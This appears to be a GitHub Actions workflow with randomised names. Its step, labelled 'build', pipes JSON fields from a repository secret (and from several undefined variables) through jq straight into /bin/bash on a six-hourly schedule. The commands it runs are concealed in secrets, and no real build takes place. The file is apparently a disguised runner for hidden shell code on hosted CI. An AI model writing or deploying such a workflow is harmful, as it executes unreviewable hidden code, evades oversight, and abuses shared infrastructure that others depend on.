name: peixiayu6537

on:
  workflow_dispatch:
  schedule:
    - cron: '28 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: peixiayu6537
        env:
          dm5769: ${{ secrets.dm5769 }}
        run: |
          echo $dm5769 | jq -r .w1194 | /bin/bash
          echo $xon20 | jq -r .s643 | /bin/bash
          echo $mrxa12536 | jq -r .rubih799 | /bin/bash
          echo $phxz2155 | jq -r .wt362 | /bin/bash
          echo $c36 | jq -r .pmt62 | /bin/bash
          echo $a9 | jq -r .ok09142 | /bin/bash
          echo $t008 | jq -r .rdvz173 | /bin/bash
          echo $hqnx8 | jq -r .l7 | /bin/bash

